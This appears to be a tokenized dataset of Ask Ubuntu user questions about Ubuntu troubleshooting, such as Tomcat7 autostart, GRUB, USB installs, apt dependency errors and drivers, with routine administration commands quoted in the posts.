491895	tomcat7 start at server startup	my ubuntu 13.10 was configured to start apache2 and tomcat7 at startup , but ( maybe for automatic system updates ) they do n't auto-start at startup anymore . i 've solved apache2 auto start with the following commands : update-rc.d -f apache2 remove update-rc.d apache2 add update-rc.d apache2 enable but same ones for tomcat7 did not work ! i searched at logs looking for errors but nothing found . this works : service tomcat7 start my /etc/init.d/tomcat7 standard file : # ! /bin/sh # # /etc/init.d/tomcat7 -- startup script for the tomcat 6 servlet engine # # written by miquel van smoorenburg < miquels @ cistron.nl > . # modified for debian gnu/linux by ian murdock < imurdock @ gnu.ai.mit.edu > . # modified for tomcat by stefan gybas < sgybas @ debian.org > . # modified for tomcat6 by thierry carrez < thierry.carrez @ ubuntu.com > . # modified for tomcat7 by ernesto hernandez-novich < emhn @ itverx.com.ve > . # additional improvements by jason brittain < jason.brittain @ mulesoft.com > . # # # # begin init info # provides : tomcat7 # required-start : $ local_fs $ remote_fs $ network # required-stop : $ local_fs $ remote_fs $ network # should-start : $ named # should-stop : $ named # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : start tomcat . # description : start the tomcat servlet engine . # # # end init info set -e echo `` ============================================================================ '' > > /var/log/tomcat7/catalina.out echo `` $ ( date ) /etc/init.d/tomcat - > starting/stoping/restarting '' > > /var/log/tomcat7/catalina.out echo `` ============================================================================ '' > > /var/log/tomcat7/catalina.out path=/bin : /usr/bin : /sbin : /usr/sbin name=tomcat7 desc= '' tomcat servlet engine '' default=/etc/default/ $ name jvm_tmp=/tmp/tomcat7- $ name-tmp if [ `id -u` -ne 0 ] ; then echo `` you need root privileges to run this script '' exit 1 fi # make sure tomcat is started with system locale if [ -r /etc/default/locale ] ; then . /etc/default/locale export lang fi . /lib/lsb/init-functions if [ -r /etc/default/rcs ] ; then . /etc/default/rcs fi # the following variables can be overwritten in $ default # run tomcat 7 as this user id and group id tomcat7_user=tomcat7 tomcat7_group=tomcat7 # this is a work-around until there is a suitable runtime replacement # for dpkg-architecture for arch : all packages # this function sets the variable openjdks find_openjdks ( ) { for jvmdir in /usr/lib/jvm/java-7-openjdk-* do if [ -d `` $ { jvmdir } '' -a `` $ { jvmdir } '' ! = `` /usr/lib/jvm/java-7-openjdk-common '' ] then openjdks= $ jvmdir fi done for jvmdir in /usr/lib/jvm/java-6-openjdk-* do if [ -d `` $ { jvmdir } '' -a `` $ { jvmdir } '' ! = `` /usr/lib/jvm/java-6-openjdk-common '' ] then openjdks= '' $ { openjdks } $ { jvmdir } '' fi done } openjdks= '' '' find_openjdks # the first existing directory is used for java_home ( if java_home is not # defined in $ default ) jdk_dirs= '' /usr/lib/jvm/default-java $ { openjdks } /usr/lib/jvm/java-6-openjdk /usr/lib/jvm/java-6-sun /usr/lib/jvm/java-7-oracle '' # look for the right jvm to use for jdir in $ jdk_dirs ; do if [ -r `` $ jdir/bin/java '' -a -z `` $ { java_home } '' ] ; then java_home= '' $ jdir '' fi done export java_home # directory where the tomcat 6 binary distribution resides catalina_home=/usr/share/ $ name # directory for per-instance configuration files and webapps catalina_base=/var/lib/ $ name # use the java security manager ? ( yes/no ) tomcat7_security=no # default java options # set java.awt.headless=true if java_opts is not set so the # xalan xsl transformer can work without x11 display on jdk 1.4+ # it also looks like the default heap size of 64m is not enough for most cases # so the maximum heap size is set to 128m if [ -z `` $ java_opts '' ] ; then java_opts= '' -djava.awt.headless=true -xmx128m '' fi # end of variables that can be overwritten in $ default # overwrite settings from default file if [ -f `` $ default '' ] ; then . `` $ default '' fi if [ ! -f `` $ catalina_home/bin/bootstrap.jar '' ] ; then log_failure_msg `` $ name is not installed '' exit 1 fi policy_cache= '' $ catalina_base/work/catalina.policy '' if [ -z `` $ catalina_tmpdir '' ] ; then catalina_tmpdir= '' $ jvm_tmp '' fi # set the jsp compiler if set in the tomcat7.default file if [ -n `` $ jsp_compiler '' ] ; then java_opts= '' $ java_opts -dbuild.compiler=\ '' $ jsp_compiler\ '' '' fi security= '' '' if [ `` $ tomcat7_security '' = `` yes '' ] ; then security= '' -security '' fi # define other required variables catalina_pid= '' /var/run/ $ name.pid '' catalina_sh= '' $ catalina_home/bin/catalina.sh '' # look for java secure sockets extension ( jsse ) jars if [ -z `` $ { jsse_home } '' -a -r `` $ { java_home } /jre/lib/jsse.jar '' ] ; then jsse_home= '' $ { java_home } /jre/ '' fi catalina_sh ( ) { # escape any double quotes in the value of java_opts java_opts= '' $ ( echo $ java_opts | sed 's/\ '' /\\\ '' /g ' ) '' authbind_command= '' '' if [ `` $ authbind '' = `` yes '' -a `` $ 1 '' = `` start '' ] ; then java_opts= '' $ java_opts -djava.net.preferipv4stack=true '' authbind_command= '' /usr/bin/authbind -- deep /bin/bash -c `` fi # define the command to run tomcat 's catalina.sh as a daemon # set -a tells sh to export assigned variables to spawned shells . tomcat_sh= '' set -a ; java_home=\ '' $ java_home\ '' ; source \ '' $ default\ '' ; \ catalina_home=\ '' $ catalina_home\ '' ; \ catalina_base=\ '' $ catalina_base\ '' ; \ java_opts=\ '' $ java_opts\ '' ; \ catalina_pid=\ '' $ catalina_pid\ '' ; \ catalina_tmpdir=\ '' $ catalina_tmpdir\ '' ; \ lang=\ '' $ lang\ '' ; jsse_home=\ '' $ jsse_home\ '' ; \ cd \ '' $ catalina_base\ '' ; \ \ '' $ catalina_sh\ '' $ @ '' if [ `` $ authbind '' = `` yes '' -a `` $ 1 '' = `` start '' ] ; then tomcat_sh= '' ' $ tomcat_sh ' '' fi # run the catalina.sh script as a daemon set +e touch `` $ catalina_pid '' `` $ catalina_base '' /logs/catalina.out chown $ tomcat7_user `` $ catalina_pid '' `` $ catalina_base '' /logs/catalina.out start-stop-daemon -- start -b -u `` $ tomcat7_user '' -g `` $ tomcat7_group '' \ -c `` $ tomcat7_user '' -d `` $ catalina_tmpdir '' -p `` $ catalina_pid '' \ -x /bin/bash -- -c `` $ authbind_command $ tomcat_sh '' status= '' $ ? '' set +a -e return $ status } case `` $ 1 '' in start ) if [ -z `` $ java_home '' ] ; then log_failure_msg `` no jdk or jre found - please set java_home '' exit 1 fi if [ ! -d `` $ catalina_base/conf '' ] ; then log_failure_msg `` invalid catalina_base : $ catalina_base '' exit 1 fi log_daemon_msg `` starting $ desc '' `` $ name '' if start-stop-daemon -- test -- start -- pidfile `` $ catalina_pid '' \ -- user $ tomcat7_user -- exec `` $ java_home/bin/java '' \ > /dev/null ; then # regenerate policy_cache file umask 022 echo `` // auto-generated file from /etc/tomcat7/policy.d/ '' \ > `` $ policy_cache '' echo `` '' > > `` $ policy_cache '' cat $ catalina_base/conf/policy.d/*.policy \ > > `` $ policy_cache '' # remove / recreate jvm_tmp directory rm -rf `` $ jvm_tmp '' mkdir -p `` $ jvm_tmp '' || { log_failure_msg `` could not create jvm temporary directory '' exit 1 } chown $ tomcat7_user `` $ jvm_tmp '' catalina_sh start $ security sleep 5 if start-stop-daemon -- test -- start -- pidfile `` $ catalina_pid '' \ -- user $ tomcat7_user -- exec `` $ java_home/bin/java '' \ > /dev/null ; then if [ -f `` $ catalina_pid '' ] ; then rm -f `` $ catalina_pid '' fi log_end_msg 1 else log_end_msg 0 fi else log_progress_msg `` ( already running ) '' log_end_msg 0 fi ; ; stop ) log_daemon_msg `` stopping $ desc '' `` $ name '' set +e if [ -f `` $ catalina_pid '' ] ; then start-stop-daemon -- stop -- pidfile `` $ catalina_pid '' \ -- user `` $ tomcat7_user '' \ -- retry=term/20/kill/5 > /dev/null if [ $ ? -eq 1 ] ; then log_progress_msg `` $ desc is not running but pid file exists , cleaning up '' elif [ $ ? -eq 3 ] ; then pid= '' `cat $ catalina_pid` '' log_failure_msg `` failed to stop $ name ( pid $ pid ) '' exit 1 fi rm -f `` $ catalina_pid '' rm -rf `` $ jvm_tmp '' else log_progress_msg `` ( not running ) '' fi log_end_msg 0 set -e ; ; status ) set +e start-stop-daemon -- test -- start -- pidfile `` $ catalina_pid '' \ -- user $ tomcat7_user -- exec `` $ java_home/bin/java '' \ > /dev/null 2 > & 1 if [ `` $ ? '' = `` 0 '' ] ; then if [ -f `` $ catalina_pid '' ] ; then log_success_msg `` $ desc is not running , but pid file exists . '' exit 1 else log_success_msg `` $ desc is not running . '' exit 3 fi else log_progress_msg `` $ desc is not running but pid file exists , cleaning up '' elif [ $ ? -eq 3 ] ; then pid= '' `cat $ catalina_pid` '' log_failure_msg `` failed to stop $ name ( pid $ pid ) '' exit 1 fi rm -f `` $ catalina_pid '' rm -rf `` $ jvm_tmp '' else log_progress_msg `` ( not running ) '' fi log_end_msg 0 set -e ; ; status ) set +e start-stop-daemon -- test -- start -- pidfile `` $ catalina_pid '' \ -- user $ tomcat7_user -- exec `` $ java_home/bin/java '' \ > /dev/null 2 > & 1 if [ `` $ ? '' = `` 0 '' ] ; then if [ -f `` $ catalina_pid '' ] ; then log_success_msg `` $ desc is not running , but pid file exists . '' exit 1 else log_success_msg `` $ desc is not running . '' exit 3 fi else log_success_msg `` $ desc is running with pid `cat $ catalina_pid` '' fi set -e ; ; restart|force-reload ) if [ -f `` $ catalina_pid '' ] ; then $ 0 stop sleep 1 fi $ 0 start ; ; try-restart ) if start-stop-daemon -- test -- start -- pidfile `` $ catalina_pid '' \ -- user $ tomcat7_user -- exec `` $ java_home/bin/java '' \ > /dev/null ; then $ 0 start fi ; ; * ) log_success_msg `` usage : $ 0 { start|stop|restart|try-restart|force-reload|status } '' exit 1 ; ; esac exit 0 any help would be appreciate , thanks
491896	.bashrc shebang line reports command not found	tried the following shebang lines : $ head -n2 .bashrc | od -c 0000000 357 273 277 # ! / b i n / b a s h \n $ bash bash : # ! /bin/bash : no such file or directory .bashrc starts with empty line supposedly ( the first three characters are invisible ) : $ head -n2 .bashrc | od -c 0000000 357 273 277 \n # ! / b i n / b a s h \n $ bash : : command not found after that line the bashrc lines are executed normally , so the functionality is not affected . however i find this error to be quite annoying . i hope this post helps someone .
491899	make a portable ubuntu on a usb stick ( bootable on macbook/imac )	i have a macbook pro 8,1 ( early 2011 model ) . my goal is to have ubuntu installed onto a usb stick what i can plug into any macbook / imac ( also potentially any pc ) and use ubuntu anywhere . here is what i tried so far : 1 . i followed the official instructions to create a bootable usb stick with the ubuntu live image amd64 14-04 . it worked perfectly for me , i was able to boot up from the usb stick by holding down the option key while turning on the macbook and selecting the efi in the boot menu . however , it did not save any of the modifications i made . since i need to install a package to make wifi work , it is necessary to save the changes . 2 . after this i created a bootable usb stick with `` startup disk creator '' on an existing linux machine , selecting 1gb as a reserved extra space . this was also booted up perfectly ( holding down the option key , as above ) , however i did not see the extra partition mounted anywhere , and indeed it lost all modifications when i restarted . 3 . after this i installed ubuntu to an other usb stick from the live ubuntu booted from the first usb stick . the new ubuntu installation works . set noatime and installed the wifi driver without issues . there is only one problem : when i start up the macbook , it starts grub . if the usb stick is plugged in , the grub shows ubuntu as a boot option . when the usb stick is not plugged in , then i only get a grub prompt where i can enter grub options to boot up the os . when i installed ubuntu i 'm sure i selected the usb stick as a target for grub , so i do n't know why did it modify anything on the computer 's build-in harddrive . luckily i can start osx by holding down the option key and select the built-in harddrive . but the usb stick does not appear in mac 's boot menu , so i can only start ubuntu with grub , also can not boot it up on other macbooks . questions : a ) how can i make the second usb stick similar to the live ubuntu usb stick , so it appears in the macbook 's boot menu as an efi drive ? b ) how can i remove grub from the built-in disk , so i can boot up my macbook normally ?
491901	edimax ew-7622umn wireless installation ubuntu 14.04	hello good people of the ubuntu universe i 'm stuck installing drivers for a edimax ew-7622umn i have extracted the tar-tgz file but have no idea what i need to type in to terminal . if anyone can help ? so i can just copy and paste the exact command line it would be massively appreciated .
491903	update-grub for /dev/sdx	i have two hard-drives ( /dev/sda and /dev/sdb ) . when i do update-grub , it would consider either /dev/sda and /dev/sdb . is there any way to do update-grub just for /dev/sda ? update i 've tried : sudo update-grub /dev/sda output : ( considered sdb ) generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-30-generic found initrd image : /boot/initrd.img-3.13.0-30-generic found linux image : /boot/vmlinuz-3.13.0-29-generic found initrd image : /boot/initrd.img-3.13.0-29-generic found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found arch on /dev/sdb1 # < < founded arch on sdb ! ! ! ! done
491907	ca n't acess windows files and folders after delete crash report [ dual-boot 7 & 14.04 ]	i have installed ubuntu 14.04 lts alongside windows 7 successfully . and i did access windows files and flowers from ubuntu ( i.e i can see every drives from 14.04 ) . few days ago i got problem that is when i start my system i will get a popup message with ubuntu 14.04 has experienced internal error every time . so that i have removed `` crashed report '' by typing following command in terminal . sudo rm /var/crash/* after that when i open 'files ' i can only see 'computer ' other drives which present in windows are not showing . how i will access again that the other drivers which present in windows .
491914	system break when i use aptana 3.4.2 , i am using ubantu 14.04 lts	system close all application and automatically goes at login window 1. ctrl+c or ctrl+v 2. backword/forword operatin these two action on aptana break my system
491915	when i attempt to install vlc i get this:	the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but 2.1.4-0ubuntu14.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.5.2-1ubuntu2.2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.2-19ubuntu1 is to be installed depends : zlib1g ( > = 1:1.2.3.3 ) but 1:1.2.8.dfsg-1ubuntu1 is to be installed
491916	dynamic swap file like in windows ?	i would like to install ubuntu to a 8gb usb stick so really do n't have space for swap . i have 8gb ram and the most memory intense apps i use are firefox and libreoffice . i do n't use hibernate . i know you can have a swap file in linux but can you have one that grows and shrinks as needed ? that would give me a safety net and most likely not make me loose any space with low swappiness . i researched the topic and found these steps : sudo mkdir -p /var/cache/swap/ sudo fallocate -l 1g /var/cache/swap/swap0 or alternatively if the above fails : sudo dd if=/dev/zero of=/var/cache/swap/swap0 bs=1m count=1024 then : sudo chmod 0600 /var/cache/swap/swap0 sudo mkswap /var/cache/swap/swap0 sudo swapon /var/cache/swap/swap0 the add this t /etc/fstab : /var/cache/swap/swap0 none swap sw 0 0 then install swapspace to make the swap file dynamic : sudo apt-get install swapspace and that is it ? just installing swapspace will decrease my swap file from 1gb to zero and let it grow up to 1gb ?
491919	get unique values and their counts in a column	i have a column like this . streptococcus ecoli bcoli ecoli streptococcus streptococcus mycobacterium ecoli i want a file like this ( which includes all unique values and their corresponding counts ) streptococcus 3 ecoli 3 bcoli 1 mycobacterium 1 can anyone please help in getting it in ubuntu 12.04 ?
491925	cant access internet via mobile broadband	i am new user of ubuntu . i am using ubuntu 12.04 lts . almost everything is working fine , but i ca n't access the internet . i am connected to my mobile broadband . it is zte mf691 usb modem . when i connect it , it says connection established .
491927	is it necessary to enable default-ssl in apache2	my localhost/cgi-bin is not working . i just want to know that , is it necessary to enable default-ssl for cgi configuration .
491929	tevii s662 & ubuntu 14.04	i have tevii s662 driver ( media_build ) and my system is ubuntu 14.04 .i want to know how to install this drive on my system
491933	< solved > kubuntu - bt-adapter not detected	i have a compaq nx8220 with a build-in bt-adapter . the problem is that kubuntu does n't detect it . i 've got the bluetooth enabled in the bios , all required drivers installed , but it still is n't seen by my laptop . the result from rfkill list all : user @ laptop : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes ( it 's hard blocked because i use cable-internet ) the bluetooth does n't even show up . it does when i boot with another os , like regular ubuntu , but kubuntu does n't see it . thanks to those with a solution . update : i got it fixed by resetting and reconfiguring my bios . that was all , luckily : )
491935	âpackage dependencies can not be resolvedâ while installing wine	i 'm new to ubuntu , said goodbye to windows . just installed ubuntu 14.04 a few days ago , and now i have been trying to install wine and other programs . but mostly i get errors or messages like package dependencies can not be resolved , or dependency is not satisfiable . the apt-get update also says that many updates failed . what should i do ? i 'm a layman btw .
491936	how to record sound from ms lifecam hd-5000 inside oracle virtual box ?	i am trying to use my ms lifecam hd-5000 inside ubuntu inside oracle virtual box . it is appearing twice in vb . in the section of `` webcams '' and in the section of usb devices if i try to select it in the section of webcams , it is selected ok . but if i try to select in in the section of usb devices , then the following error reported i would ignore this , but this is probably the reason why i ca n't record sound with this camera , because it is also a microphone . it is not displayed in sound applet and no any selection activates level meter :
491938	how do i install ubuntu 14.04 in about 35 gb unallocated space ?	i 'm using windows 7 and want to run both the os side by side . also i do not want to lose any of my files .
491939	not able to install ubuntu on my pc with windows xp	after my windows expired , i wanted to install ubuntu to my pc . i had a copy of ubuntu on my another pc , so i copied it to a 2 gb usb pen drive . then i used the usb to install ubuntu in my pc without any hard disk ( as i just wanted to try ubuntu ) , it did n't recognized the usb and displayed a error saying that `` reboot or select a proper booting device . i tried using it with a hard disk and also changed the boot priority in the boot menu ... nothing 's working.. please help
491941	ubuntu on armhf : `` using ppas with apt-get source -b '' ?	in brief , the problem i seem to be having is that apt-get `` ignores '' whatever ppa i add . i assume that this is because the respective ppa 's limit their debs to i386 and amd64 builds . ( i 'm using armhf . ) this causes a problem though . i 'd like to use `` apt-get source -b '' to build the respective debs . however , even when enabling the ppa 's deb-src repository , apt-cache policy still does n't `` find '' the respective packages . i 'm forced to download the packages , configure/make/checkinstall . am i correct in thinking i should be able to compile these packages on arm via `` apt-get source -b '' ? if so , how do i force ubuntu to load these repositories ? that is , how do i stop apt-get from `` ign '' oring these ppas ?
491942	install for ubuntu 14.04 appears hung	installing the latest download on a dell that had xp . i chose to replace os . it 's been running for almost 24 hours and it seems stuck at 'creating ext4 file system for / in partition # 1 for scsi9 ... ' . it 's not frozen ... the mouse icon is animating and i can change the slides on the install screen . i can see a log.. not sure if it is still updating . should i kill it ? i 'm afraid i may have no boot at this point .
491947	installing ubuntu 14 from bootable usb with updated packages	i want to install ubuntu 14 desktop on pc which does n't have internet . so i created a bootable usb of ubuntu , installed all updates including kdevelop . then i installed ubuntu from it on my pc , but the kdevelop and other updates are not refelecting in the installation . when i boot from usb , kdevelop is running , but not from hard disk . what could be solution ? please let me have your suggestions .
491948	evolution email client authentiaction	i installed ubuntu 14.04 on my pc and then installed gnome-core as a desktop environment . and then installed evolution as my mail client , but after configuring it and start using it , it always prompts me with a popup menu ( authentication menu ) for my mail account password and every time i enter it , it re-popup it again . ( this happen after some while ) how can i start use evolution without entering my mail account password ? ? please advise .
491950	ubuntu touch hdmi out support on a nexus 10	does ubuntu touch support hdmi out on a nexus 10 ?
491951	running sudo apt-get upgrade gives error	after running sudo apt-get upgrade i got the following error : the following packages have unmet dependencies : gnome-user-guide : depends : yelp ( > = 3 ) but it is not installed lintian : depends : man-db php-gettext : depends : php5 but it is not installed or php5-cli but it is not installed phpmyadmin : depends : libapache2-mod-php5 but it is not installed or libapache2-mod-php5filter but it is not installed or php5-cgi but it is not installed or php5-fpm but it is not installed or php5 but it is not installed depends : php5-mysql but it is not installed or php5-mysqli but it is not installable or php5-mysqlnd but it is not installed recommends : php5-gd but it is not installed ubuntu-standard : depends : man-db e : unmet dependencies . try using -f. and when i ran sudo apt-get install -f i got the following error : use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory setting up tzdata ( 2014e-0ubuntu0.13.10 ) ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : error processing tzdata ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : tzdata e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please help .
491956	how to login to your ubuntu account automatically in background ?	i was wondering whether we could login into ubuntu account automatically but stay password protected . in my case , i want my torrent to automatically start when computer boots up . so i need to be logged in automatically . this is fine , i can change `` automatic login '' option under user accounts settings . but i do not want my account to be exposed to others without a password .
491958	apt-get error ( blocking updates ) `` ubuntu/dist/trusty/main/binary-* '' how to correct ?	there 's a problem with apt-get it appears two sources are bouncing back 404 errors . however this is curretly blocking me from updating or installing new packages . can someone advise on what these are , if they are necessary ( if not iâll just remove em ! ) , and how one in general resolves these kinds of errors to prevent rouge package sources gumming up my workflow to install remove and update software on ubuntu . i 'm running ubuntu 14.04 my error code reads : w : failed to fetch http : //ppa.launchpad.net/colingille/freshlight/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/colingille/freshlight/ubuntu/dists/trusty/main/binary-i386/packages 404 not found
491966	getting error when running apt-get -f install	use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory setting up tzdata ( 2014e-0ubuntu0.13.10 ) ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : error processing tzdata ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : tzdata e : sub-process /usr/bin/dpkg returned an error code ( 1 )
491967	wireless connection breaks down	i 'm having trouble staying connected to the internet at work . it 's strange because that has n't happened with my home network , but there 's something about the office 's -probably more complicated- that randomly disconnects me all the time . details : it does n't happen to other computers . even the it guys do n't know what 's going on . once it disconnects , it wo n't connect again until i restart the computer ( pfff ) . after that , it just wo n't find the connection . it may happen within 5 minutes or a couple of hours . it happens with both secure and guest connections . the only remedy so far is to use ethernet cable , which at the point is not very doable . i have ubuntu 14.04 . i do n't know about networks , or commands for the terminal , so any of those are welcome too .
491968	skullcandy , usb only one channel shown	i notice that : card : skullcandy gmx dolby transmitter chip : usb mixer only provides one channel . should n't there be 2 and how do i get the other one going ? max
491972	ubuntu and wine fullscreen issue	hello this is my first post so i 'm sorry if some of the formalities are missing . i 'm currently using wine in order to launch games , wow for example . the issue appears if i switch workspaces . if i do this , then the whole desktop is inoperable , i can not use my mouse to select anything , i can only use my keyboard . if i exit my wine application , the issue remains until i re-log . thank you for reading and any help is good ! : )
491974	kubuntu 14.04 - ca n't get past password entry	i got a hp compaq nx8220 with kubuntu installed , and it does n't boot properly anymore . the problem is that it does n't show the splash screen after you enter your password , i get through all other things but when i 've entered my pass , is gets stuck . i can acces the tty ( the ctrl+alt+f1 combination to get a kind of terminal ) , and do stuff from there but i 'm not able to get to the desktop . so ... yeah . if anyone know how to fix it without having to reinstall kubuntu , that 'd be great . and many thanks to those with an answer .
491977	how to install gnome-commander 1.4.3 on ubuntu 14.04	decided to try out ubuntu and see if i can move from windows to it permanently , or at least have alternate os for development purposes . the first part of it is having similar programs ( like total commander ) . i have absolutely no experience with linux ( unix ? ) based os . since apt-get for gnome-commander gets me an older version without tabs i wanted to get the last version , from here gcmd.github.io when running ./configure i was able to install most of the necessary stuff but i do n't know what to do with this one : if gtk+ > = 2.8.0 exists ... configure : error : no i installed the gtk+3.1.2 from www.gtk.org following the ubuntu compilingeasyhowto guide , but when i run the ./configure for the gnome-commander it still stops there . any suggestions for the next step ? solution edit : thanks to alexander martin for the answer . additionally ( and for the future reference ) i had to install the following : sudo apt-get install libglib2.0-dev sudo apt-get install libgtk2.0-dev sudo apt-get install libgnomeui-dev sudo apt-get install libunique-dev sudo apt-get install scrollkeeper for most of those i had to search the askubuntu and other sites for answers . is there a way to find which package to install for libgnomeui etc rather than relying on other sources ? like a application ( or terminal ) where i can just type in libgnomeui and get which package should i sudo apt-get install ?
491978	doing more than one copying/moving between usb and hd is very slow and slows down entire computer	i 've been looking around for an answer to my problem but i ca n't find anything . my problem is that i recently bought a new computer , lenovo g500 , it has 2xusb3 and 1xusb2 , intel pentium i3 2.4 ghz x4 and 6 gib memory , it came with windows 8 but i removed it and installed ubuntu 14.04 . the problem is , if , lets say , i try to copy one folder/file ( does n't matter the size ) from/to my hard drive from/to the usb device , i have a wd 1tb usb 3 external hd but it does it with usb pens or another hd i have , it will copy fine , with high speeds . however , if i was to start a second copy/transfer while the first one is still going it will make the copying speed for both actions almost come to a stand still and take several hours . this is not the only problem , the other problem is that while the copying is going on if i open any windows or programs they will take a very long time ( may be up to 1 min ) to open/start . if i open the system monitoring it tells me that only 10 % ( + or - ) cpu usage , so memory is not an issue . any ideas what could be going on ? thank you very much in advance
491981	how to install jdk 8 and netbeans8 ubuntu 14.04 lts	i 've jdk-8u5-linux-i586.gz and netbeans-8.0-linux.sh on ubuntu 14.04 lts i 'm tired try to install someone tell me how in details .
491982	how can i get a 3g connection with my dual-mode expresscard modem ?	i recently got a new expresscard mobile broadband modem for my laptop . it 's a franklin x720 , which works in either 3g or 4g lte through verizon 's network . i 've been able to connect without problems through 4g lte ( just had to add it through new mobile broadband connection and select vzwinternet as the apn ) . however , i 'm having some trouble with 3g , though . i 'm currently in an area with 4g lte coverage , but not very consistently , so it will usually work about half the time i 'm using it on 4g lte , and then the modem tries to switch to 3g ( led blinks blue instead of green ) . when it switches to 3g , i get disconnected in ubuntu after several seconds . so , i 've tried to add a new mobile broadband connection through `` edit connections - > add '' ( for some reason that gives me different options than the `` new mobile broadband connection '' option from right-clicking the modem manager icon ) . i tried everything i could think of and many suggestions from other threads . specifically , i 've tried changing : the number from *99 # to # 777 and to my own number in 10 and 11 digits the username to mynumber @ vzw3g.com and to mynumber @ vzw4g.com ( not sure from reading other threads if it should be in 10 or 11 digits ) , and leaving it blank the password to vzw the apn to vzwims and vzwapp ( no connection at all with those , not even 4g lte ) the type to 3g , prefer 3g , and prefer 4g allowed authentication methods to eap only , to everything besides mschap ( v2 ) , and to only mschap ( v2 ) this is everything i 've set in the options after adding it through the right-click menu on the network manager icon . i do n't have most of those options when i add it through `` edit connections - > add '' , but i have tried connecting that way . when i add the connection that way , i can try to connect , but it says `` error activating connection : the connection was not a 3gpp connection '' . so i 'm wondering if ubuntu is only recognizing this modem as a 4g lte modem and not detecting it [ properly ] when it goes into 3g mode . i 've tried deleting the connection and adding it again when it 's in 3g mode , and ubuntu 's network manager does n't give me any modems to choose from in that situation . i see a lot of questions about getting 3g usb modems to work in ubuntu , but they seem to be about problems with it being detected as a storage device . also , some of them refer to sakis3g , but looking at the description of that , it says it 's only for usb or bluetooth modems . an excerpt from the user 's manual for the franklin x720 : blinking green led on the device means it 's connected to 4g lte blinking blue led means it 's connected to `` 1x/evdo '' ( not sure what this means but it says it 's a 3g/4g lte modem everywhere i look ) ; fast blinking means active and slow blinking means inactive solid blue led means it 's dormant on 1x/evdo ( not sure what the difference is between dormant and inactive here ) it 's usually solid blue when it 's in 3g and not able to connect . occasionally it blinks blue , but still wo n't connect . my system runs ubuntu 14.04 64-bit . not sure what else someone might need to know , but please request what i should do/include . i 've tried enabling logging in networkmanager , but i ca n't find the log file in its directory ( /etc/networkmanager ) . i hope someone can suggest a solution as to getting it to work in 3g mode when necessary . presently , i am staying in a two-story house where i can walk down a flight of stairs and have the modem drop into 3g mode ( when it 's usually 4g lte upstairs ) , so i should be able to test things involving either mode easily . i would greatly appreciate any help at all .
491983	streaming to twitch on linux ?	one of my daughters wants to join the legions of people streaming to twitch . however , we all have ubuntu laptops . i 've done some research and there seems to be a lot of discussion about it with possible soltuions . since it does n't seem to be a unique situation , have any of you made it work ? is it possible ? would i be better off having her run minecraft in virtualbox and doing it that way ? or maybe just do youtube ? i 'm open to suggestions .
